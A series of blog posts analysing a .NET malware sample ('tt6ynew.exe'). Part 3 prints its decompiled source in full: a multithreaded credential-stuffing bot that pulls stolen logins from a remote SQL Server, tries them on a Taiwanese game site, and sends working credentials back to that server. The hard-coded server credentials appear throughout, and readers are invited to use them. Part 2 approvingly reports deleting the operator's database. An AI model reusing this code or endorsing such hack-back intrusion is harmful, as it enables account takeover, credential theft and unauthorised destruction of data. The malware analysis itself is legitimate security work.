.Net Virus tt6ynew.exe Part 3

Looks like my friends (Sina & Sami) are so eager to know what’s inside the virus so here it is:
 
1) Module1: which is something like program.cs:
 
namespace ConsoleApplication1
{
    using Microsoft.VisualBasic.CompilerServices;
    using System;
    using System.Collections.Generic;
    using System.Threading;
    // Entry point of the decompiled sample. The [StandardModule] attribute and the
    // ProjectData.SetProjectError/ClearProjectError pairs are what the VB.NET compiler emits,
    // so the original was presumably written in VB.NET and is shown here as decompiled C#.
    // NOTE(review): the page rendering replaced some '-' operators with '–', so the listing
    // does not compile exactly as printed.
    //
    // Analyst summary: reads run parameters and a batch of account credentials from a remote
    // SQL Server, hands slices of that batch to onethread workers, and repeats. The host name,
    // database name, SQL logins and table names hard-coded below are the indicators this page
    // provides for the sample.
    [StandardModule]
    internal sealed class Module1
    {
        // Same value as the table name passed to sql.GetUsers in Main.
        // ("zhanghao" is presumably pinyin for "account" — not confirmed by the code.)
        public const string Datatable = "tt2_6y_newzhanghao";
        // Same value as the @gname parameter sent to the get_config stored procedure in sql.GetConfig.
        public const string Gamename = "tt6ynew";
        // Number of accounts each worker processes per round; filled in by sql.GetConfig.
        public static int Onetimes;
        // Lower id bound (exclusive) of the next batch of accounts; filled in by sql.GetConfig.
        public static int Startid;
        // Same value as the table onethread.main writes results to.
        public const string table_users = "tt2_6y_newusers";
        // Not referenced anywhere in the code shown on this page.
        public const string table_zh = "tt2_6y_users";
        // Number of workers per round; filled in by sql.GetConfig.
        public static int Threads;
        // Main loop: fetch config, fetch a batch of credentials, run the workers, repeat until the
        // round limit is reached or Startid has caught up with the total reported by the server.
        [STAThread]
        public static void Main()
        {
            // 0x3e9 = 1001 slots for the credential batch of one round.
            string[] userid = new string[0x3e9];
            string[] password = new string[0x3e9];
            // num  : round limit (starts at 10, recomputed once from measured timing below).
            // num5 : seconds accumulated over the first three rounds.
            // num3 : number of completed rounds.
            int num = 10;
            int num5 = 0;
            int num3 = 0;
            // Hard-coded SQL Server host, login, password and database used for reading
            // the config and the account list.
            string server = "ok8.com.ru";
            sql sql = new sql(ref server, "dreader", "reader1006", "allusers");
            while (true)
            {
                try
                {
                    // num2 receives the "totleusers" column from get_config.
                    int num2;
                    DateTime now;
                    // Only the first three rounds are timed.
                    if (num3 < 3)
                    {
                        now = DateTime.Now;
                    }
                    // Run parameters come from the server on every round, so whoever controls
                    // the database controls thread count and batch size of every running copy.
                    sql.open();
                    sql.GetConfig(ref Startid, ref Threads, ref Onetimes, ref num2);
                    sql.close();
                    int count = Threads * Onetimes;
                    // Stop when the round limit is hit or the server reports no more accounts.
                    // sql.open and sql.GetConfig catch their own exceptions and leave the ref
                    // arguments untouched, so with the database unreachable this test is made on
                    // whatever values were there before (presumably zeros on the first round).
                    if ((num3 >= num) | (Startid >= num2))
                    {
                        return;
                    }
                    // Fetch the rows with Startid < id <= Startid + count.
                    sql.open();
                    sql.GetUsers("tt2_6y_newzhanghao", Startid, count, ref userid, ref password);
                    sql.close();
                    List<Thread> list = new List<Thread>();
                    int num9 = Threads – 1;
                    for (int i = 0; i <= num9; i++)
                    {
                        // 0x65 = 101 slots per worker; worker i gets entries
                        // [Onetimes * i, Onetimes * i + Onetimes - 1] of the batch.
                        string[] strArray4 = new string[0x65];
                        string[] strArray3 = new string[0x65];
                        int num10 = Onetimes – 1;
                        for (int j = 0; j <= num10; j++)
                        {
                            strArray4[j] = userid[(Onetimes * i) + j];
                            strArray3[j] = password[(Onetimes * i) + j];
                        }
                        // The worker index doubles as the name printed in its console output.
                        onethread onethread = new onethread(strArray4, strArray3, i.ToString());
                        if (Threads > 1)
                        {
                            Thread item = new Thread(new ThreadStart(onethread.main));
                            try
                            {
                                item.Start();
                                list.Add(item);
                            }
                            catch (Exception exception1)
                            {
                                // A thread that fails to start is reported and not added to the list.
                                ProjectData.SetProjectError(exception1);
                                Exception ex = exception1;
                                Functions.prtError(ex);
                                ProjectData.ClearProjectError();
                            }
                        }
                        else
                        {
                            // Single-worker configuration runs on the main thread.
                            onethread.main();
                        }
                    }
                    if (Threads > 1)
                    {
                        // Wait for every worker of this round before starting the next one.
                        int num11 = Threads – 1;
                        for (int k = 0; k <= num11; k++)
                        {
                            list[k].Join();
                        }
                    }
                    if (num3 < 3)
                    {
                        TimeSpan span = (TimeSpan) (DateTime.Now – now);
                        num5 = (int) Math.Round((double) (num5 + span.TotalSeconds));
                    }
                    if (num3 == 3)
                    {
                        // num5 / 3 is the average duration of the timed rounds; the new limit is
                        // the number of such rounds that fit in 600 seconds, minus 2.
                        // NOTE(review): presumably this caps one run at roughly ten minutes — confirm.
                        num = (int) Math.Round((double) ((600.0 / (((double) num5) / 3.0)) – 2.0));
                    }
                    num3++;
                }
                catch (Exception exception3)
                {
                    // Every exception is discarded without logging. num3 is not incremented on
                    // this path, so the loop simply starts the same round again.
                    ProjectData.SetProjectError(exception3);
                    Exception exception2 = exception3;
                    ProjectData.ClearProjectError();
                }
            }
        }
    }
}
 
 
This gets the config and starts as many main threads as the config says.
 
2) MainThread:
 
namespace ConsoleApplication1
{
    using Microsoft.VisualBasic;
    using Microsoft.VisualBasic.CompilerServices;
    using System;
    using System.Threading;
    // Worker run by Module1.Main, one instance per thread. For each credential pair it was given,
    // it attempts a login on secure.plaync.com.tw, then walks the event pages under
    // event.plaync.com.tw and records the outcome together with the working credentials in the
    // remote database.
    // NOTE(review): several string literals below contain typographic quotes (‘ ’) or unescaped
    // inner quotes; these look like page-rendering damage and the listing does not compile as printed.
    // The "web" helper (Url, getHtml, postData, cutContent, htmltext) is not shown on this page.
    public class onethread
    {
        // Holds the __VIEWSTATE value scraped from the login page.
        private string check1;
        // check2 and idc are not used in the code shown here.
        private string check2;
        private string idc;
        private string[] idcard;
        // Second connection to the same server, using the "idata" login (see constructors).
        private sql mysql;
        private web myweb;
        // Credential pair currently being tried.
        private string pass;
        private string[] password;
        private string points;
        private string threadname;
        private string user;
        private string[] userid;
        // All three constructors allocate 0x2711 = 10001-slot arrays and open their own sql helper
        // with a hard-coded host, login ("idata"), password and database. This is a different login
        // from the "dreader" one used in Module1.Main; in the visible code it is the one used for
        // InsertData, i.e. for writing results.
        private onethread()
        {
            this.userid = new string[0x2711];
            this.password = new string[0x2711];
            this.idcard = new string[0x2711];
            string server = "ok8.com.ru";
            this.mysql = new sql(ref server, "idata", "haha8591", "allusers");
            this.myweb = new web();
        }
        // Constructor used by Module1.Main; the freshly allocated arrays are immediately replaced
        // by the caller's arrays.
        public onethread(string[] userid, string[] password, string threadname)
        {
            this.userid = new string[0x2711];
            this.password = new string[0x2711];
            this.idcard = new string[0x2711];
            string server = "ok8.com.ru";
            this.mysql = new sql(ref server, "idata", "haha8591", "allusers");
            this.myweb = new web();
            this.userid = userid;
            this.password = password;
            this.threadname = threadname;
        }
        // Variant that also takes an idcard array; no caller for it appears on this page.
        public onethread(string[] userid, string[] password, string[] idcard, string threadname)
        {
            this.userid = new string[0x2711];
            this.password = new string[0x2711];
            this.idcard = new string[0x2711];
            string server = "ok8.com.ru";
            this.mysql = new sql(ref server, "idata", "haha8591", "allusers");
            this.myweb = new web();
            this.userid = userid;
            this.password = password;
            this.idcard = idcard;
            this.threadname = threadname;
        }
        // Processes the first Module1.Onetimes entries of userid/password.
        public void main()
        {
            // Column names and values for the extra fields stored with each result.
            // NOTE(review): the names look like pinyin (character / prize / server zone), which
            // matches the values assigned to others[0..2] below — not otherwise confirmed.
            string[] othersTab = new string[3];
            string[] others = new string[3];
            othersTab[0] = "renwu";
            othersTab[1] = "jiangpin";
            othersTab[2] = "qu";
            Console.WriteLine("thead" + this.threadname + " was ready!");
            int index = 0;
            while (index < Module1.Onetimes)
            {
                this.user = this.userid[index];
                this.pass = this.password[index];
                index++;
                // Skip empty slots.
                if (this.user == "")
                {
                    continue;
                }
                // Step 1: fetch the login form and pull out its __VIEWSTATE, percent-encoding
                // '=', '+' and '/' by hand so it can be placed in the POST body.
                this.myweb.Url = "https://secure.plaync.com.tw/login.aspx?returnPage=https%3A%2F%2Fevent%2Eplaync%2Ecom%2Etw%2Fl2event%2FEvent%2F091223%2Fselect%5Fchar%5F6YearsGift%2Easp";
                this.myweb.getHtml("", "utf-8");
                this.check1 = this.myweb.cutContent("__VIEWSTATE" value="", "" />").Replace("=", "%3D").Replace("+", "%2B").Replace("/", "%2F");
                // Random pause of 1 or 2 seconds (Next(1, 3) yields 1 or 2; 0x3e8 = 1000 ms).
                // The same pause precedes every request below.
                Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                // Step 2: submit the credential pair to the login form.
                this.myweb.Url = "https://secure.plaync.com.tw/login.aspx?returnPage=https%3a%2f%2fevent.plaync.com.tw%2fl2event%2fEvent%2f091223%2fselect_char_6YearsGift.asp";
                this.myweb.postData("__VIEWSTATE=" + this.check1 + "&inAccount=" + this.user + "&inPassword=" + this.pass + "&inReturnPage=https%3A%2F%2Fevent.plaync.com.tw%2Fl2event%2FEvent%2F091223%2Fselect_char_6YearsGift.asp&btnLogIn.x=45&btnLogIn.y=20", "", "big5");
                // The presence of a location.replace( redirect in the response is treated as a
                // successful login.
                if (Strings.InStr(this.myweb.htmltext, "location.replace(‘", CompareMethod.Binary) != 0)
                {
                    string[] strArray3;
                    Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                    // Step 3: load the character-selection page of the event.
                    this.myweb.Url = "https://event.plaync.com.tw/l2event/Event/091223/select_char_6YearsGift.asp";
                    this.myweb.getHtml("", "big5");
                    // Pick either the first <option> or the last <option> before </select>, at random.
                    Random random = new Random();
                    if (random.Next(0, 2) == 1)
                    {
                        strArray3 = Strings.Split(Strings.Split(this.myweb.htmltext, "<option value=", -1, CompareMethod.Binary)[1], ">", -1, CompareMethod.Binary);
                    }
                    else
                    {
                        strArray3 = Strings.Split(Strings.Split(this.myweb.htmltext, "</select>", -1, CompareMethod.Binary)[0], "<option value=", -1, CompareMethod.Binary);
                        strArray3 = Strings.Split(strArray3[strArray3.Length – 1], ">", -1, CompareMethod.Binary);
                    }
                    // str3: value of the chosen option (sent as "svr");
                    // str5: first option value found in the page script for that choice (sent as "char_id").
                    string str3 = strArray3[0];
                    string str5 = Strings.Split(Strings.Split(this.myweb.htmltext, "strOption" + str3 + " += "<option value=’", -1, CompareMethod.Binary)[1], "’", -1, CompareMethod.Binary)[0];
                    Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                    this.myweb.Url = "https://event.plaync.com.tw/l2event/Event/091223/game_6YearsGift.asp";
                    this.myweb.postData("chkOk=0&svr=" + str3 + "&char_id=" + str5, "", "big5");
                    // Step 4: repeat the process/show_msg request pair until the result page no
                    // longer contains the success text. The only exit from this loop is the goto.
                    while (true)
                    {
                        Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                        this.myweb.Url = "https://event.plaync.com.tw/l2event/Event/091223/process6YearsGift.asp";
                        this.myweb.postData("chkOk=0&svr=" + str3 + "&char_id=" + str5, "https://event.plaync.com.tw/l2event/Event/091223/game_6YearsGift.asp", "big5");
                        string str4 = this.myweb.cutContent("idx" value="", """);
                        Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                        this.myweb.Url = "https://event.plaync.com.tw/l2event/Event/091223/show_msg_6YearsGift.asp";
                        this.myweb.postData("chkOk=0&cd=1&idx=" + str4, "https://event.plaync.com.tw/l2event/Event/091223/process6YearsGift.asp", "big5");
                        // The marker text reads "Congratulations, you received:"; the console
                        // message reads "draw finished".
                        if (Strings.InStr(this.myweb.htmltext, "恭喜您獲得:", CompareMethod.Binary) == 0)
                        {
                            Console.Write("抽完");
                            goto Label_0472;
                        }
                        // str2: text after "Congratulations, you received:" (extracted twice with
                        // the same arguments); str: text after "The item will be placed in:" up to '@'.
                        string str2 = this.myweb.cutContent("恭喜您獲得:<span class="w2">「", "」");
                        str2 = this.myweb.cutContent("恭喜您獲得:<span class="w2">「", "」");
                        string str = this.myweb.cutContent("道具將置入:<span class="w2">「", "@");
                        this.points = Conversions.ToString(0);
                        others[0] = str;
                        others[1] = str2;
                        others[2] = str3;
                        // Store the working credential pair together with the extracted values.
                        // NOTE(review): this six-argument InsertData overload is not part of the
                        // sql class as listed on this page, so the listing is incomplete.
                        this.mysql.open();
                        this.mysql.InsertData("tt2_6y_newusers", this.user, this.pass, this.points, othersTab, others);
                        this.mysql.close();
                    }
                }
                // Reached only when the login marker was not found; the success branch above
                // always leaves through the goto.
                Console.WriteLine(this.user + "XXXXXXX");
            Label_0472:
                Console.WriteLine(this.threadname + ": " + Conversions.ToString(index));
            }
            Console.WriteLine("thead" + this.threadname + " was ok!");
        }
    }
}
 
This is what gets called on each thread, and it makes the web calls.
 
3) SQL.cs : which is a sql connection helper:
 
namespace ConsoleApplication1
{
    using Microsoft.VisualBasic.CompilerServices;
    using System;
    using System.Data;
    using System.Data.SqlClient;
    // Thin wrapper around one SqlConnection/SqlCommand pair, used by Module1 and onethread to
    // talk to the operator's SQL Server. Except for GetConfig, statements are built by string
    // concatenation. Most methods catch every exception and either pass it to Functions.prtError
    // (not shown on this page) or discard it, so database failures never propagate to callers.
    // NOTE(review): onethread.main calls a six-argument InsertData that is not in this listing,
    // so the class as printed is incomplete. The typographic quotes (‘ ’) inside the SQL literals
    // look like page-rendering damage.
    public class sql
    {
        // Most recently created command; replaced by every query method.
        private SqlCommand cmd;
        private SqlConnection conn;
        private sql()
        {
        }
        // Builds a SQL-authentication connection string from the given parts. All visible callers
        // pass hard-coded literals, so host, login and password sit in plain text in the binary.
        public sql(ref string server, string userid, string password, string database)
        {
            this.conn = new SqlConnection("Data Source=" + server + ";user id=" + userid + ";password=" + password + ";Initial Catalog=" + database + ";");
        }
        // Closes the connection if it is Open or Broken; any exception is discarded.
        public void close()
        {
            try
            {
                if ((this.conn.State == ConnectionState.Open) | (this.conn.State == ConnectionState.Broken))
                {
                    this.conn.Close();
                }
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception exception = exception1;
                ProjectData.ClearProjectError();
            }
        }
        // Calls the stored procedure get_config with @gname = "tt6ynew" and copies the columns
        // startid, threads, onetimes and totleusers of the first row into the ref arguments.
        // The result of reader.Read() is not checked. On any exception the ref arguments keep
        // their previous values and the error goes to Functions.prtError.
        public void GetConfig(ref int startid, ref int threads, ref int onetimes, ref int totleusers)
        {
            this.cmd = new SqlCommand();
            try
            {
                this.cmd.Connection = this.conn;
                this.cmd.CommandType = CommandType.StoredProcedure;
                this.cmd.CommandText = "get_config";
                this.cmd.Parameters.Add(new SqlParameter("@gname", SqlDbType.NVarChar, 50));
                this.cmd.Parameters["@gname"].Value = "tt6ynew";
                SqlDataReader reader = this.cmd.ExecuteReader();
                reader.Read();
                startid = Conversions.ToInteger(reader.GetValue(reader.GetOrdinal("startid")));
                threads = Conversions.ToInteger(reader.GetValue(reader.GetOrdinal("threads")));
                onetimes = Conversions.ToInteger(reader.GetValue(reader.GetOrdinal("onetimes")));
                totleusers = Conversions.ToInteger(reader.GetValue(reader.GetOrdinal("totleusers")));
                reader.Close();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(ex);
                ProjectData.ClearProjectError();
            }
        }
        // Reads userid/password from the table now_gash for startid < id <= startid + count into
        // the caller's arrays, in row order. No caller for this method appears on this page.
        public void GetGameid(int startid, int count, ref string[] gameid, ref string[] gamepass)
        {
            try
            {
                // Set on whatever command object is already in this.cmd; the command that
                // actually runs is created two statements later.
                this.cmd.CommandTimeout = 100;
                int num2 = startid + count;
                this.cmd = new SqlCommand("select userid,password from now_gash where id>" + Conversions.ToString(startid) + " and id<=" + num2.ToString(), this.conn);
                SqlDataReader reader = this.cmd.ExecuteReader();
                for (long i = 0L; reader.Read(); i += 1L)
                {
                    gameid[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("userid")));
                    gamepass[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("password")));
                }
                reader.Close();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(ex);
                ProjectData.ClearProjectError();
            }
        }
        // Reads userid/password from the given table for startid < id <= startid + count into the
        // caller's arrays, in row order. This is the overload Module1.Main uses to fetch a batch
        // of credentials. Table name and bounds are concatenated into the statement text.
        public void GetUsers(string table, int startid, int count, ref string[] userid, ref string[] password)
        {
            try
            {
                string[] strArray = new string[] { "select userid,password from ", table, " where id>", Conversions.ToString(startid), " and id<=", (startid + count).ToString() };
                this.cmd = new SqlCommand(string.Concat(strArray), this.conn);
                SqlDataReader reader = this.cmd.ExecuteReader();
                for (long i = 0L; reader.Read(); i += 1L)
                {
                    userid[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("userid")));
                    password[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("password")));
                }
                reader.Close();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(ex);
                ProjectData.ClearProjectError();
            }
        }
        // Same as the five-argument overload, but also reads an idcard column. No caller for this
        // overload appears on this page.
        public void GetUsers(string table, int startid, int count, ref string[] userid, ref string[] password, ref string[] idcard)
        {
            try
            {
                // As in GetGameid, this applies to the previous command object, not the one
                // created below.
                this.cmd.CommandTimeout = 100;
                string[] strArray = new string[] { "select userid,password,idcard from ", table, " where id>", Conversions.ToString(startid), " and id<=", (startid + count).ToString() };
                this.cmd = new SqlCommand(string.Concat(strArray), this.conn);
                SqlDataReader reader = this.cmd.ExecuteReader();
                for (long i = 0L; reader.Read(); i += 1L)
                {
                    userid[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("userid")));
                    password[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("password")));
                    idcard[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("idcard")));
                }
                reader.Close();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(ex);
                ProjectData.ClearProjectError();
            }
        }
        // Inserts one userid/password row, stamped with getdate(), into the given table. The
        // values are concatenated into the statement as quoted literals. On failure the
        // credential pair is passed to Functions.prtError along with the exception.
        public void InsertData(string table, string userid, string password)
        {
            try
            {
                this.cmd = new SqlCommand("INSERT INTO " + table + "(userid, password,times) VALUES(‘" + userid + "’,’" + password + "’,getdate())", this.conn);
                this.cmd.ExecuteNonQuery();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(userid, password, ex);
                ProjectData.ClearProjectError();
            }
        }
        // Writes an error text to the "error" table with gamename 'tt6ynew', after stripping
        // commas and quote characters from it. Opens and closes the connection itself when it
        // was closed on entry. Any exception is discarded. No caller appears on this page
        // (presumably Functions.prtError uses it — not shown).
              public void InsertError(string errorcode)
        {
            try
            {
                errorcode = errorcode.Replace(",", "").Replace("’", "");
                if (this.conn.State == ConnectionState.Closed)
                {
                    this.conn.Open();
                    this.cmd = new SqlCommand("INSERT INTO error(times,errorcode,gamename) VALUES(getdate(),’" + errorcode + "’,’tt6ynew’)", this.conn);
                    this.cmd.ExecuteNonQuery();
                    this.conn.Close();
                }
                else
                {
                    this.cmd = new SqlCommand("INSERT INTO error(times,errorcode,gamename) VALUES(getdate(),’" + errorcode + "’,’tt6ynew’)", this.conn);
                    this.cmd.ExecuteNonQuery();
                }
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception exception = exception1;
                ProjectData.ClearProjectError();
            }
        }
        // Opens the connection if it is Closed; a failure to connect is discarded, so callers
        // only find out when the following query throws inside its own try block.
                public void open()
        {
            if (this.conn.State == ConnectionState.Closed)
            {
                try
                {
                    this.conn.Open();
                }
                catch (Exception exception1)
                {
                    ProjectData.SetProjectError(exception1);
                    Exception exception = exception1;
                    ProjectData.ClearProjectError();
                }
            }
        }
    }
}
 
There were also some other classes, a web helper and an encryption helper, which I don’t think are very helpful. But GOD this man is crazy, he doesn’t change the Database password…
 
By the way, I’ve found a very good and helpful free utility for connecting to DBs called SqlDbx http://www.sqldbx.com/ — it is portable and light (1.00 MB) and it can connect to MS Sql Server, Oracle, DB2 and some other DBs which I don’t work with, and it also has the magical Syntax Highlighting and some good script auto-complete.
 
Hope you’ll find it helpful,
Sadjad Bahmanpour

.Net Virus tt6ynew.exe Part 2

During past night my brother ‘Komeil’ has just deleted all the contents from that mother f…er’s SQL Server and the other day when we checked out he has just changed his SQL server password and as I’ve mentioned in my earlier post the user name and password for the Database is hard coded so the virus cannot do its job any more.
 
As my brother said, there were 250,000,000+ records in just one of his tables. WOW… looks like he’s been doing just fine.
 
Hey we’ve cleaned one virus from face of internet and I’m proud myself for that 😀
Sadjad Bahmanpour

.Net Virus tt6ynew.exe

Tonight I found a .Net Virus, and I think it is the first of its kind. I have thought for years about writing a trojan with .Net, because no antivirus will think of it as a virus and you could do some tricks like Reflection or on-the-fly class/code generation and make it so hard to catch, but I’m not a virus programmer.
 
But as you might know, I’m good at .Net Reflection (Thanks to El Mistro ‘Lutz Roeder’ for his great tool Reflector http://www.red-gate.com/products/reflector/) so I tried to reflect the Virus and WOW it worked, so here, step by step, is what it does:
 
1) It first tries to connect some Sql Server with these settings: "Data Source=ok8.com.ru;user id=dreader;password=reader1006;Initial Catalog=allusers;"
So be my guest to try that your self
 
2) After connection it gets its config & some users from a table called "tt2_6y_newzhanghao"
 
3) And then starts some Threads (The number is in the config from 2)
 
4) From each Thread it logs in to a web site called: https://secure.plaync.com.tw/
 
5) If step 4 succeeds, it connects to a web page under: https://event.plaync.com.tw/
 
6) After getting some response it inserts some data to the same Sql Server into some table named: "tt2_6y_newusers"
this time with userid=idata and password=haha8591 and Database=allusers
 
And to be honest I don’t know what that website is, and I don’t know why this JERK who wrote a .Net virus tries to do that with my connection.
 
Anyway, if you know something about it, let me know,
Sadjad Bahmanpour